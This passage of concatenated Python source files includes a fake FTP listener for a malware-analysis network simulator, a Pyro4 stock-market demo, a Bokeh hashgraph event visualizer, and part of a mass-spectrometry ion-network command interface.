    'ws_ftp-1.0.3 ': '{servername} X2 WS_FTP Server 1.0.3 (0)',
    'ws_ftp-1.0.5 ': '{servername} X2 WS_FTP Server 1.0.5 (0)',
    'ws_ftp-2.0.0 ': '{servername} X2 WS_FTP Server 2.0.0 (0)',
    'ws_ftp-2.0.3 ': '{servername} X2 WS_FTP Server 2.0.3 (0)',
    'ws_ftp-3.00 ': '{servername} X2 WS_FTP Server 3.00 (0)',
    'ws_ftp-3.1.3 ': '{servername} X2 WS_FTP Server 3.1.3 (0)',
    'ws_ftp-4.0.0 ': '{servername} X2 WS_FTP Server 4.0.0 (0)',
    'ws_ftp-4.0.2 ': '{servername} X2 WS_FTP Server 4.0.2 (0)',
    'ws_ftp-5.0.0 ': '{servername} X2 WS_FTP Server 5.0.0 (0)',
    'ws_ftp-5.0.2 ': '{servername} X2 WS_FTP Server 5.0.2 (0)',
    'ws_ftp-5.0.4 ': '{servername} X2 WS_FTP Server 5.0.4 (0)',
    'ws_ftp-5.0.5 ': '{servername} X2 WS_FTP Server 5.0.5 (0)',
    'ws_ftp-6.0': '{servername} X2 WS_FTP Server 6.0(0)',
    'ws_ftp-6.1': '{servername} X2 WS_FTP Server 6.1(0)',
    'ws_ftp-6.1.1': '{servername} X2 WS_FTP Server 6.1.1(0)',
    'ws_ftp-7.0': '{servername} X2 WS_FTP Server 7.0(0)',
    'ws_ftp-7.1': '{servername} X2 WS_FTP Server 7.1(0)',
    'ws_ftp-7.5': '{servername} X2 WS_FTP Server 7.5(0)',
    'ws_ftp-7.5.1': '{servername} X2 WS_FTP Server 7.5.1(0)',
    'ws_ftp-7.6': '{servername} X2 WS_FTP Server 7.6(0)',
    'ws_ftp-7.6-fips': '{servername} X2 WS_FTP Server 7.6(0) FIPS',
    'ws_ftp-7.6.2': '{servername} X2 WS_FTP Server 7.6.2(0)',
    'ws_ftp-7.6.2-fips': '{servername} X2 WS_FTP Server 7.6.2(0) FIPS',
    'ws_ftp-7.6.3': '{servername} X2 WS_FTP Server 7.6.3(0)',
    'ws_ftp-7.7': '{servername} X2 WS_FTP Server 7.7(0)',
}
class FakeFTPHandler(FTPHandler, object):
    """FTP handler that accepts any credentials by registering users on demand."""

    def ftp_PASS(self, line):
        # Lazily register the announced username with whatever password was
        # supplied (full permissions), so every login attempt succeeds.
        username = self.username
        authorizer = self.authorizer
        if not authorizer.has_user(username):
            authorizer.add_user(username, line, self.ftproot_path, 'elradfmwM')
        return super(FakeFTPHandler, self).ftp_PASS(line)
class TLS_FakeFTPHandler(TLS_FTPHandler, object):
    """TLS-enabled variant of FakeFTPHandler: any credentials are accepted."""

    def ftp_PASS(self, line):
        # Lazily register the announced username with whatever password was
        # supplied (full permissions), so every login attempt succeeds.
        username = self.username
        authorizer = self.authorizer
        if not authorizer.has_user(username):
            authorizer.add_user(username, line, self.ftproot_path, 'elradfmwM')
        return super(TLS_FakeFTPHandler, self).ftp_PASS(line)
class FakeFS(AbstractedFS):
    """Virtual filesystem that never reports a missing path and never deletes."""

    def open(self, filename, mode):
        # An unknown virtual path is answered with a canned file chosen by
        # the requested extension (default: FakeNetMini.exe).
        if not self.lexists(filename):
            _, extension = os.path.splitext(filename)
            fake_name = EXT_FILE_RESPONSE.get(extension.lower(), u'FakeNetMini.exe')
            filename = os.path.join(os.path.dirname(filename), fake_name)
        return super(FakeFS, self).open(filename, mode)

    def chdir(self, path):
        # An unknown virtual directory resolves to the current directory.
        if not self.lexists(path):
            path = u'.'
        return super(FakeFS, self).chdir(path)

    def remove(self, path):
        """Ignore file deletions to keep the fake content intact."""
        pass

    def rmdir(self, path):
        """Ignore directory removals to keep the fake content intact."""
        pass
class FTPListener(object):
    """FakeNet listener that emulates an FTP (optionally FTPS) server."""

    def taste(self, data, dport):
        """Return a confidence score (0-2) that `data` is FTP traffic.

        +1 when the destination port is 21, +1 when the payload starts with
        a known FTP command.
        """
        # See RFC5797 for full command list. Many of these commands are not likely
        # to be used but are included in case malware uses FTP in unexpected ways
        base_ftp_commands = [
            'abor', 'acct', 'allo', 'appe', 'cwd', 'dele', 'help', 'list', 'mode',
            'nlst', 'noop', 'pass', 'pasv', 'port', 'quit', 'rein', 'rest', 'retr',
            'rnfr', 'rnto', 'site', 'stat', 'stor', 'stru', 'type', 'user'
        ]
        opt_ftp_commands = [
            'cdup', 'mkd', 'pwd', 'rmd', 'smnt', 'stou', 'syst'
        ]
        confidence = 1 if dport == 21 else 0
        data = data.lstrip().lower()
        for command in base_ftp_commands + opt_ftp_commands:
            if data.startswith(command):
                return confidence + 1
        return confidence

    def __init__(self,
                 config,
                 name='FTPListener',
                 logging_level=logging.INFO,
                 running_listeners=None,
                 diverter=None
                 ):
        """Store the configuration and resolve the fake FTP root directory.

        Exits the process if the configured ftproot cannot be located.
        """
        self.logger = logging.getLogger(name)
        self.logger.setLevel(logging_level)
        self.config = config
        self.name = name
        self.local_ip = config.get('ipaddr')
        self.server = None
        self.running_listeners = running_listeners
        self.diverter = diverter
        # NOTE(review): this overwrites the `name` assigned above — confirm
        # the fixed 'FTP' display name is intentional.
        self.name = 'FTP'
        self.port = self.config.get('port', 21)
        self.logger.debug('Starting...')
        self.logger.debug('Initialized with config:')
        # Python 2 dict API (iteritems) — consistent with the SocketServer import.
        for key, value in config.iteritems():
            self.logger.debug('  %10s: %s', key, value)
        # Initialize ftproot directory
        path = self.config.get('ftproot','defaultFiles')
        # ListenerBase presumably comes from the package wildcard import — verify.
        self.ftproot_path = ListenerBase.abs_config_path(path)
        if self.ftproot_path is None:
            self.logger.error('Could not locate ftproot directory: %s', path)
            sys.exit(1)

    def expand_ports(self, ports_list):
        """Expand a spec like '60000-60010,61000' into a flat list of port ints."""
        ports = []
        for i in ports_list.split(','):
            if '-' not in i:
                ports.append(int(i))
            else:
                # Inclusive range 'low-high'.
                l,h = map(int, i.split('-'))
                ports+= range(l,h+1)
        return ports

    def start(self):
        """Configure the handler class and launch the threaded FTP server."""
        self.authorizer = DummyAuthorizer()
        if self.config.get('usessl') == 'Yes':
            self.logger.debug('Using SSL socket.')
            keyfile_path = 'listeners/ssl_utils/privkey.pem'
            keyfile_path = ListenerBase.abs_config_path(keyfile_path)
            if keyfile_path is None:
                self.logger.error('Could not locate %s', keyfile_path)
                sys.exit(1)
            self.handler = TLS_FakeFTPHandler
            self.handler.certfile = keyfile_path
        else:
            self.handler = FakeFTPHandler
        # NOTE: these are class-level attributes, shared by all connections.
        self.handler.banner = self.genBanner()
        self.handler.ftproot_path = self.ftproot_path
        self.handler.abstracted_fs = FakeFS
        self.handler.authorizer = self.authorizer
        self.handler.passive_ports = self.expand_ports(self.config.get('pasvports', '60000-60010'))
        self.server = ThreadedFTPServer((self.local_ip, int(self.config['port'])), self.handler)
        # Override pyftpdlib logger name
        logging.getLogger('pyftpdlib').name = self.name
        # Serve in a daemon thread so the caller is not blocked.
        self.server_thread = threading.Thread(target=self.server.serve_forever)
        self.server_thread.daemon = True
        self.server_thread.start()

    def stop(self):
        """Shut down the server, closing all active connections."""
        self.logger.debug('Stopping...')
        if self.server:
            self.server.close_all()

    def genBanner(self):
        """Render the configured banner template via BannerFactory."""
        bannerfactory = BannerFactory.BannerFactory()
        return bannerfactory.genBanner(self.config, BANNERS)
###############################################################################
# Testing code
def test(config):
    """Smoke-test the listener: connect to localhost, log in with throwaway
    credentials (any pair is accepted) and request a directory listing."""
    import ftplib
    ftp_client = ftplib.FTP()
    ftp_client.connect('localhost', int(config.get('port', 21)))
    ftp_client.login('user', 'password')
    ftp_client.dir('.')
    ftp_client.close()
def main():
    """Run the FTP listener standalone on port 21 without SSL, then self-test."""
    logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
    config = {'port': '21', 'usessl': 'No', 'protocol': 'tcp', 'ftproot': os.path.join('..', 'defaultFiles')}
    listener = FTPListener(config)
    listener.start()
    ###########################################################################
    # Run processing
    import time
    try:
        # Serve until interrupted with Ctrl-C.
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        pass
    ###########################################################################
    # Run tests
    test(config)

if __name__ == '__main__':
    main()
|
stockmarket.py | from __future__ import print_function
import random
import threading
import time
import Pyro4
class StockMarket(object):
    """Simulated stock market that pushes random quotes to registered aggregators."""

    def __init__(self, marketname, symbols):
        self.name = marketname
        # Each symbol gets a fixed mean price; quotes fluctuate around it.
        self.symbolmeans = {sym: random.uniform(20, 200) for sym in symbols}
        self.aggregators = []

    def generate(self):
        """Create fresh quotes for a random ~20% of symbols and notify aggregators."""
        quotes = {}
        for symbol, mean_price in self.symbolmeans.items():
            if random.random() < 0.2:
                quotes[symbol] = round(random.normalvariate(mean_price, 20), 2)
        print("new quotes generated for", self.name)
        for aggregator in self.aggregators:
            aggregator.quotes(self.name, quotes)

    def listener(self, aggregator):
        """Register an aggregator interested in this market's quotes."""
        print("market {0} adding new aggregator".format(self.name))
        self.aggregators.append(aggregator)

    def symbols(self):
        """Return the list of ticker symbols traded on this market."""
        return list(self.symbolmeans.keys())

    def run(self):
        """Start a daemon thread that generates quotes at random intervals."""
        def quote_loop():
            while True:
                time.sleep(random.random())
                self.generate()

        worker = threading.Thread(target=quote_loop)
        worker.setDaemon(True)
        worker.start()
def main():
    """Register two demo markets with the Pyro4 name server and serve requests."""
    nasdaq=StockMarket("NASDAQ", ["AAPL", "CSCO", "MSFT", "GOOG"])
    newyork=StockMarket("NYSE", ["IBM", "HPQ", "BP"])
    # Expose both market objects through a Pyro daemon.
    daemon=Pyro4.Daemon()
    nasdaq_uri=daemon.register(nasdaq)
    newyork_uri=daemon.register(newyork)
    # Make them discoverable under well-known names.
    ns=Pyro4.locateNS()
    ns.register("example.stockmarket.nasdaq",nasdaq_uri)
    ns.register("example.stockmarket.newyork",newyork_uri)
    # Start generating quotes in background threads.
    nasdaq.run()
    newyork.run()
    print("Stockmarkets running.")
    daemon.requestLoop()

if __name__ == "__main__":
    main()
|
viz.py | # -*- coding: utf-8 -*-
import threading
from functools import partial
from time import sleep, strftime, gmtime
from bokeh.io import curdoc
from bokeh.layouts import row, column
from bokeh.models import (Button, TextInput, ColumnDataSource, PanTool, HoverTool, PreText, WheelZoomTool)
from bokeh.palettes import plasma, small_palettes
from bokeh.plotting import figure
from twisted.internet import threads, reactor
from tornado import gen
from bptc.data.event import Fame
from bptc.protocols.pull_protocol import PullClientFactory
# Color palettes used when rendering events.
R_COLORS = small_palettes['Set2'][8]
doc = curdoc()
I_COLORS = plasma(256)
# Gate for the pulling thread: set once the previous pull has been processed.
ready_event = threading.Event()
ready_event.set()
class App:
    """Bokeh application that pulls hashgraph events from BPTC clients and
    renders them as a live-updating plot (one x column per member, event
    height on the y axis)."""

    def __init__(self):
        self.pull_thread = None
        self.pulling = False
        # The twisted reactor performs all network I/O in a background thread.
        if not reactor.running:
            self.start_reactor_thread()
        self.text = PreText(text='Restart the process to clear all events.',
                            width=500, height=100)
        self.ip_text_input = TextInput(value='localhost')
        self.port_text_input = TextInput(value='8001')
        self.single_pull_button = Button(label="single pull", width=150)
        self.single_pull_button.on_click(partial(self.single_pull, self.ip_text_input, self.port_text_input))
        self.pulling_button = Button(label="start/stop pulling", width=150)
        self.pulling_button.on_click(partial(self.toggle_pulling, self.ip_text_input, self.port_text_input))
        # All events ever received, keyed by event id.
        self.all_events = {}
        # Maps a member's verify key to its x column in the plot.
        self.member_id_to_x = {}
        self.n_nodes = 10
        plot = figure(
            plot_height=800, plot_width=1800, y_range=(0, 30), x_range=(0, self.n_nodes - 1),
            tools=[PanTool(),  # dimensions=[Dimensions.height, Dimensions.width]
                   HoverTool(tooltips=[
                       ('id', '@id'), ('from', '@from'), ('height', '@height'), ('witness', '@witness'),
                       ('round', '@round'), ('data', '@data'), ('famous', '@famous'),
                       ('round_received', '@round_received'), ('consensus_timestamp', '@consensus_timestamp')])])
        plot.add_tools(WheelZoomTool())
        plot.xgrid.grid_line_color = None
        plot.xaxis.minor_tick_line_color = None
        plot.ygrid.grid_line_color = None
        plot.yaxis.minor_tick_line_color = None
        self.index_counter = 0
        # Segments linking each event to its parents.
        self.links_src = ColumnDataSource(data={'x0': [], 'y0': [], 'x1': [],
                                                'y1': [], 'width': []})
        self.links_rend = plot.segment(color='#777777',
                                       x0='x0', y0='y0', x1='x1',
                                       y1='y1', source=self.links_src, line_width='width')
        # One circle per event; columns mirror the hover tooltips above.
        self.events_src = ColumnDataSource(
            data={'x': [], 'y': [], 'round_color': [], 'line_alpha': [],
                  'round': [], 'id': [], 'payload': [], 'time': [], 'from': [], 'height': [], 'data': [],
                  'witness': [], 'famous': [], 'round_received': [], 'consensus_timestamp': []})
        self.events_rend = plot.circle(x='x', y='y', size=20, color='round_color',
                                       line_alpha='line_alpha', source=self.events_src, line_width=5)
        control_row = row(self.text, self.ip_text_input, self.port_text_input, self.single_pull_button,
                          self.pulling_button)
        main_row = column([control_row, plot])
        doc.add_root(main_row)

    def single_pull(self, ip_text_input, port_text_input):
        """Trigger the reactor to pull from the specified client."""
        ip = ip_text_input.value
        port = int(port_text_input.value)
        factory = PullClientFactory(self, doc, ready_event)
        # Run the connect call on the reactor thread and wait for it.
        threads.blockingCallFromThread(reactor, partial(reactor.connectTCP, ip, port, factory))

    def toggle_pulling(self, ip_text_input, port_text_input):
        """Start/stop a thread that frequently triggers the reactor to pull from the specified client."""
        if self.pulling:
            self.pull_thread.stop()
            self.pulling = False
        else:
            ip = ip_text_input.value
            port = int(port_text_input.value)
            factory = PullClientFactory(self, doc, ready_event)
            self.pull_thread = PullingThread(ip, port, factory)
            self.pull_thread.daemon = True
            self.pull_thread.start()
            self.pulling = True

    @gen.coroutine
    def received_data_callback(self, from_member, events):
        """Called by the reactor when a Pull was successful. Process the received data."""
        print('received_data_callback()')
        patch = {}
        new_events = []
        for event in events:
            if event.id in self.all_events:
                # Known event.
                if event.consensus_time is not None:
                    # Event has (now) reached consensus: patch its rendered
                    # attributes in place.
                    # NOTE(review): this re-patches on every pull once
                    # consensus_time is set, even if nothing changed —
                    # presumably harmless but redundant; confirm.
                    if 'round_color' not in patch:
                        patch['round_color'] = []
                        patch['famous'] = []
                        patch['round_received'] = []
                        patch['consensus_timestamp'] = []
                    index = self.all_events[event.id].index
                    patch['round_color'].append((index, self.color_of(event)))
                    patch['famous'].append((index, self.fame_to_string(event.is_famous)))
                    patch['round_received'].append((index, event.round_received))
                    patch['consensus_timestamp'].append((index, event.consensus_time))
            else:
                # Unknown event.
                if event.verify_key not in self.member_id_to_x.keys():
                    # Unknown member: assign the next free x column.
                    self.member_id_to_x[event.verify_key] = len(self.member_id_to_x)
                event.index = len(self.all_events)
                self.all_events[event.id] = event
                new_events.append(event)
        self.events_src.patch(patch)
        events, links = self.extract_data(new_events)
        self.links_src.stream(links)
        self.events_src.stream(events)
        print("Updated member {} at {}...\n".format(from_member[:6], strftime("%H:%M:%S", gmtime())))
        # Allow the pulling thread to issue the next pull.
        ready_event.set()

    def extract_data(self, events):
        """Extract the data out of the event list and adapt it for the use with Bokeh."""
        events_data = {'x': [], 'y': [], 'round_color': [], 'line_alpha': [], 'round': [], 'id': [], 'payload': [],
                       'time': [], 'from': [], 'height': [], 'data': [], 'witness': [], 'famous': [],
                       'round_received': [], 'consensus_timestamp': []}
        links_data = {'x0': [], 'y0': [], 'x1': [], 'y1': [], 'width': []}
        for event in events:
            x = self.member_id_to_x[event.verify_key]
            y = event.height
            events_data['x'].append(x)
            events_data['y'].append(y)
            events_data['round_color'].append(self.color_of(event))
            events_data['round'].append(event.round)
            events_data['id'].append(event.id[:6] + "...")
            # NOTE(review): "".format(event.data) always yields '' — probably
            # meant "{}".format(event.data); the 'data' column below carries
            # the payload, so this column may be dead weight. Verify.
            events_data['payload'].append("".format(event.data))
            events_data['time'].append(event.time)
            events_data['line_alpha'].append(1)
            events_data['from'].append(event.verify_key[:6] + '...')
            events_data['height'].append(event.height)
            events_data['data'].append('None' if event.data is None else str(event.data))
            events_data['witness'].append('Yes' if event.is_witness else 'No')
            events_data['famous'].append(self.fame_to_string(event.is_famous))
            events_data['round_received'].append(event.round_received)
            events_data['consensus_timestamp'].append(event.consensus_time)
            # Segment to the self-parent (thick line), if it is already known.
            self_parent_id = event.parents.self_parent
            if self_parent_id is not None and self_parent_id in self.all_events:
                self_parent = self.all_events[self_parent_id]
                links_data['x0'].append(x)
                links_data['y0'].append(y)
                # NOTE(review): x1 is stringified while x0 stays numeric —
                # verify Bokeh coerces this as intended.
                links_data['x1'].append(str(self.member_id_to_x[self_parent.verify_key]))
                links_data['y1'].append(self_parent.height)
                links_data['width'].append(3)
            # Segment to the other-parent (thin line), if it is already known.
            other_parent_id = event.parents.other_parent
            if other_parent_id is not None and other_parent_id in self.all_events:
                other_parent = self.all_events[other_parent_id]
                links_data['x0'].append(x)
                links_data['y0'].append(y)
                links_data['x1'].append(str(self.member_id_to_x[other_parent.verify_key]))
                links_data['y1'].append(other_parent.height)
                links_data['width'].append(1)
        return events_data, links_data

    @staticmethod
    def color_of(event):
        """Return the color of the given event."""
        if event.consensus_time is not None:
            # confirmed
            if event.data is not None:
                # with data
                color = '#FF8000'  # orange
            else:
                # without data
                color = '#000000'  # black
        else:
            # not confirmed
            if event.data is not None:
                # with data
                color = '#F7D358'  # light orange
            else:
                # without data
                color = '#A4A4A4'  # grey
        return color

    @staticmethod
    def fame_to_string(fame):
        """Convert the fame of an event to a string.

        NOTE(review): implicitly returns None for any other value — confirm
        Fame has only these three members.
        """
        if fame is Fame.UNDECIDED:
            return 'UNDECIDED'
        elif fame is Fame.FALSE:
            return 'NO'
        elif fame is Fame.TRUE:
            return 'YES'

    @staticmethod
    def start_reactor_thread():
        """Start the reactor in a separate thread."""
        def start_reactor():
            reactor.run(installSignalHandlers=0)
        thread = threading.Thread(target=start_reactor)
        thread.daemon = True
        thread.start()
        print('Started reactor')
App()
class PullingThread(threading.Thread):
    """Thread with a cooperative stop() method.

    run() re-checks stopped() on every iteration, so the thread exits after
    the current pull once stop() has been called.
    """

    def __init__(self, ip, port, factory):
        super(PullingThread, self).__init__()
        self.ip = ip
        self.port = port
        self.factory = factory
        self._stop_event = threading.Event()

    def run(self):
        while not self.stopped():
            # Wait until the previous pull has been fully processed.
            ready_event.wait()
            ready_event.clear()
            print('Try to connect...')
            connect = partial(reactor.connectTCP, self.ip, self.port, self.factory)
            threads.blockingCallFromThread(reactor, connect)
            sleep(2.0)

    def stop(self):
        """Request that run() exit after its current iteration."""
        self._stop_event.set()

    def stopped(self):
        """Return True once stop() has been requested."""
        return self._stop_event.is_set()
|
interface.py | #!python
# builtin
import os
import threading
# external
import PySimpleGUI as sg
import click
# local
from ion_networks import ms_run_files
from ion_networks import ms_database
from ion_networks import ms_utils
from ion_networks import browser
def convert_data_formats_to_csvs(
    input_path,
    data_type,
    output_directory,
    parameter_file_name,
    log_file_name,
    threads=None
):
    """
    Convert centroided MSMS data to a unified csv that can be read as an
    ion-network.

    Parameters
    ----------
    input_path : iterable[str]
        An iterable with file and/or folder names.
    output_directory : str or None
        If provided, all new files will be saved in this directory.
    data_type : str
        The data type of the input files. Options are:
            'DDA'
            'SONAR'
            'HDMSE'
            'SWIMDIA'
            'DIAPASEF'
    parameter_file_name : str or None
        If provided, parameters will be read from this file.
    log_file_name : str or None
        If provided, all logs will be written to this file.
    threads : int or None
        If provided, override the maximum number of threads to use.
    """
    # Normalize optional paths to absolute paths ('' means "not provided").
    if parameter_file_name is None:
        parameter_file_name = ""
    if parameter_file_name != "":
        parameter_file_name = os.path.abspath(parameter_file_name)
    if output_directory is None:
        output_directory = ""
    if output_directory != "":
        output_directory = os.path.abspath(output_directory)
    parameters = ms_utils.read_parameters_from_json_file(
        file_name=parameter_file_name,
        default="convert"
    )
    if threads is not None:
        ms_utils.set_threads(threads)
    # TODO: Proper parsing of empty log...?
    if (log_file_name is None) or (log_file_name == ""):
        log_file_name = parameters["log_file_name"]
    if log_file_name == "":
        log_file_name = output_directory
    with ms_utils.open_logger(log_file_name) as logger:
        logger.info(f"Converting to generic input csvs")
        input_file_names = ms_utils.get_file_names_with_extension(
            input_path,
            extension=ms_utils.DATA_TYPE_FILE_EXTENSIONS[data_type]
        )
        file_count = len(input_file_names)
        logger.info(
            f"{file_count} input_file{'s' if file_count != 1 else ''}"
            f": {input_file_names}"
        )
        logger.info(f"data_type: {data_type}")
        logger.info(f"output_directory: {output_directory}")
        logger.info(f"parameter_file_name: {parameter_file_name}")
        logger.info(f"max_threads: {ms_utils.MAX_THREADS}")
        logger.info("")
        if output_directory != "":
            if not os.path.exists(output_directory):
                os.makedirs(output_directory)
        for input_file_name in sorted(input_file_names):
            data = ms_utils.read_data_from_file(
                data_type,
                input_file_name,
            )
            # Strip the data-type specific extension to get the base name.
            file_name_base = os.path.basename(input_file_name)[
                :-len(ms_utils.DATA_TYPE_FILE_EXTENSIONS[data_type])
            ]
            if output_directory == "":
                # Default: write next to the input file.
                output_path = os.path.dirname(input_file_name)
            else:
                output_path = output_directory
            output_file_name = os.path.join(
                output_path,
                f"{file_name_base}.inet.csv"
            )
            ms_utils.write_data_to_csv_file(data, output_file_name)
def create_ion_networks(
    input_path,
    output_directory,
    parameter_file_name,
    log_file_name,
    threads=None
):
    """
    Create ion-networks from unified csv files.

    Parameters
    ----------
    input_path : iterable[str]
        An iterable with file and/or folder names.
    output_directory : str or None
        If provided, all new files will be saved in this directory.
    parameter_file_name : str or None
        If provided, parameters will be read from this file.
    log_file_name : str or None
        If provided, all logs will be written to this file.
    threads : int or None
        If provided, override the maximum number of threads to use.
    """
    # Normalize optional paths to absolute paths ('' means "not provided").
    if parameter_file_name is None:
        parameter_file_name = ""
    if parameter_file_name != "":
        parameter_file_name = os.path.abspath(parameter_file_name)
    if output_directory is None:
        output_directory = ""
    if output_directory != "":
        output_directory = os.path.abspath(output_directory)
    parameters = ms_utils.read_parameters_from_json_file(
        file_name=parameter_file_name,
        default="create"
    )
    if threads is not None:
        ms_utils.set_threads(threads)
    # TODO: Proper parsing of empty log...?
    if (log_file_name is None) or (log_file_name == ""):
        log_file_name = parameters["log_file_name"]
    if log_file_name == "":
        log_file_name = output_directory
    with ms_utils.open_logger(log_file_name) as logger:
        logger.info(f"Creating ion-networks")
        input_file_names = ms_utils.get_file_names_with_extension(
            input_path,
            ".inet.csv"
        )
        file_count = len(input_file_names)
        logger.info(
            f"{file_count} input_file{'s' if file_count != 1 else ''}"
            f": {input_file_names}"
        )
        logger.info(f"output_directory: {output_directory}")
        logger.info(f"parameter_file_name: {parameter_file_name}")
        logger.info(f"max_threads: {ms_utils.MAX_THREADS}")
        logger.info("")
        for centroids_file_name in input_file_names:
            local_file_name = os.path.basename(centroids_file_name)
            if output_directory == "":
                # Default: write next to the input file.
                output_path = os.path.dirname(centroids_file_name)
            else:
                output_path = output_directory
            # Replace the trailing '.inet.csv' (9 characters) with '.inet.hdf'.
            ion_network_file_name = os.path.join(
                output_path,
                f"{local_file_name[:-9]}.inet.hdf"
            )
            network = ms_run_files.HDF_Network_File(
                ion_network_file_name,
                new_file=True
            )
            network.create(
                centroids_file_name=centroids_file_name,
                parameters=parameters
            )
def evidence_ion_networks(
    input_path,
    parameter_file_name,
    log_file_name,
    threads=None
):
    """
    Evidence ion-networks with each other.

    Parameters
    ----------
    input_path : iterable[str]
        An iterable with file and/or folder names.
    parameter_file_name : str or None
        If provided, parameters will be read from this file.
    log_file_name : str or None
        If provided, all logs will be written to this file.
    threads : int or None
        If provided, override the maximum number of threads to use.
    """
    # Normalize the optional parameter file path ('' means "not provided").
    if parameter_file_name is None:
        parameter_file_name = ""
    if parameter_file_name != "":
        parameter_file_name = os.path.abspath(parameter_file_name)
    parameters = ms_utils.read_parameters_from_json_file(
        file_name=parameter_file_name,
        default="evidence"
    )
    if threads is not None:
        ms_utils.set_threads(threads)
    # TODO: Proper parsing of empty log...?
    if (log_file_name is None) or (log_file_name == ""):
        log_file_name = parameters["log_file_name"]
    with ms_utils.open_logger(log_file_name) as logger:
        logger.info(f"Evidencing ion-networks")
        input_file_names = ms_utils.get_file_names_with_extension(
            input_path,
            ".inet.hdf"
        )
        file_count = len(input_file_names)
        logger.info(
            f"{file_count} input_file{'s' if file_count != 1 else ''}"
            f": {input_file_names}"
        )
        logger.info(f"parameter_file_name: {parameter_file_name}")
        logger.info(f"max_threads: {ms_utils.MAX_THREADS}")
        logger.info("")
        evidence_files = [
            ms_run_files.HDF_Evidence_File(
                file_name,
                new_file=parameters["force_overwrite"],
                is_read_only=False,
            ) for file_name in input_file_names
        ]
        # Evidence every unordered pair of files exactly once; the edges of
        # the first file of each pair are cached and reused for all partners.
        for index, evidence_file in enumerate(evidence_files[:-1]):
            logger.info(f"Caching edges of {evidence_file.file_name}")
            indptr, indices, pointers = evidence_file.ion_network.get_edges(
                symmetric=True,
                return_pointers=True
            )
            for secondary_evidence_file in evidence_files[index + 1:]:
                evidence_file.align(
                    secondary_evidence_file,
                    parameters=parameters,
                    indptr=indptr,
                    indices=indices,
                    pointers=pointers,
                )
            # Release the cached edge arrays before caching the next file's.
            del indptr, indices, pointers
def show_ion_network(
    parameter_file_name,
    log_file_name
):
    """
    Launch the ion-network browser (see `browser.Browser`).
    Parameters
    ----------
    parameter_file_name : str or None
        If provided, parameters will be read from this file.
    log_file_name : str or None
        If provided, all logs will be written to this file.
    """
    # TODO: Implementation updates
    if parameter_file_name is None:
        parameter_file_name = ""
    if parameter_file_name != "":
        parameter_file_name = os.path.abspath(parameter_file_name)
    parameters = ms_utils.read_parameters_from_json_file(
        file_name=parameter_file_name,
    )
    # TODO: Proper parsing of empty log...?
    if (log_file_name is None) or (log_file_name == ""):
        log_file_name = parameters["log_file_name"]
    with ms_utils.open_logger(log_file_name) as logger:
        logger.info(f"Showing ion-networks")
        logger.info("")
        with browser.Browser() as browser_object:
            browser_object.run()
def run_ion_network_gui():
    """Launch the graphical user interface for ion-network analysis.

    Blocks until the GUI event loop finishes; all windows are closed on exit.
    """
    with GUI() as ion_network_gui:
        ion_network_gui.run()
def create_database(
    input_path,
    output_directory,
    parameter_file_name,
    log_file_name,
    threads=None
):
    """
    Create a [database.hdf] file from fasta files.
    Parameters
    ----------
    input_path : iterable[str]
        An iterable with [*.fasta] file and/or folder names.
    output_directory : str or None
        If provided, the new database file will be saved in this directory.
    parameter_file_name : str or None
        If provided, parameters will be read from this file.
    log_file_name : str or None
        If provided, all logs will be written to this file.
    threads : int or None
        If provided, override the maximum number of threads to use.
    """
    if parameter_file_name is None:
        parameter_file_name = ""
    if parameter_file_name != "":
        parameter_file_name = os.path.abspath(parameter_file_name)
    if output_directory is None:
        output_directory = ""
    if output_directory != "":
        output_directory = os.path.abspath(output_directory)
    parameters = ms_utils.read_parameters_from_json_file(
        file_name=parameter_file_name,
        default="database"
    )
    if threads is not None:
        ms_utils.set_threads(threads)
    # TODO: Proper parsing of empty log...?
    if (log_file_name is None) or (log_file_name == ""):
        log_file_name = parameters["log_file_name"]
    if log_file_name == "":
        log_file_name = output_directory
    # TODO: turn off ms2pip logger?
    with ms_utils.open_logger(log_file_name) as logger:
        logger.info(f"Creating database")
        input_file_names = ms_utils.get_file_names_with_extension(
            input_path,
            extension=".fasta"
        )
        file_count = len(input_file_names)
        logger.info(
            f"{file_count} input_file{'s' if file_count != 1 else ''}"
            f": {input_file_names}"
        )
        logger.info(f"output_directory: {output_directory}")
        # TODO: Refer to default parameter file if necessary
        logger.info(f"parameter_file_name: {parameter_file_name}")
        logger.info(f"max_threads: {ms_utils.MAX_THREADS}")
        # TODO: include relevant individual parameters?
        logger.info("")
        # The database name concatenates all input fasta base names
        # (extension stripped), joined with underscores.
        base_name = "_".join(
            [
                ".".join(
                    os.path.basename(fasta_file_name).split(".")[:-1]
                ) for fasta_file_name in input_file_names
            ]
        )
        database_file_name = os.path.join(output_directory, base_name)
        # Suffix encodes the content: plain targets, targets+decoys
        # concatenated, or decoys only.
        if parameters["create_targets"]:
            if parameters["create_decoys"]:
                database_file_name = f"{database_file_name}_concatenated_decoy.hdf"
            else:
                database_file_name = f"{database_file_name}.hdf"
        else:
            database_file_name = f"{database_file_name}_decoy.hdf"
        db = ms_database.HDF_Database_File(
            database_file_name,
            new_file=True,
        )
        db.create_from_fastas(input_file_names, parameters)
def annotate(
    input_path,
    database_file_name,
    mgf_format,
    parameter_file_name,
    log_file_name,
    threads=None,
    fragment_ppm=None,
    export_decoys=None,
    fdr_filter=None,
    align_to_database=None
):
    """
    Annotate [*.mgf] or [*.evidence.hdf] files against a [database.hdf] file.
    Results are written next to each input file as [*.annotation.csv].
    Parameters
    ----------
    input_path : iterable[str]
        An iterable with file and/or folder names.
    database_file_name : str
        The [database.hdf] file to annotate against.
    mgf_format : bool
        If True, inputs are [*.mgf] files; otherwise [*.evidence.hdf] files.
    parameter_file_name : str or None
        If provided, parameters will be read from this file.
    log_file_name : str or None
        If provided, all logs will be written to this file.
    threads : int or None
        If provided, override the maximum number of threads to use.
    fragment_ppm : float or None
        If provided, overrides parameters["annotation_ppm"].
    export_decoys : bool or None
        If provided, overrides parameters["export_decoys"].
    fdr_filter : float or None
        If provided, overrides parameters["fdr_filter"].
    align_to_database : bool or None
        If provided, overrides parameters["align_to_database"].
    """
    if parameter_file_name is None:
        parameter_file_name = ""
    if parameter_file_name != "":
        parameter_file_name = os.path.abspath(parameter_file_name)
    database_file_name = os.path.abspath(database_file_name)
    parameters = ms_utils.read_parameters_from_json_file(
        file_name=parameter_file_name,
        default="annotation"
    )
    # Explicit keyword arguments take precedence over the parameter file.
    if fragment_ppm is not None:
        parameters["annotation_ppm"] = fragment_ppm
    if export_decoys is not None:
        parameters["export_decoys"] = export_decoys
    if fdr_filter is not None:
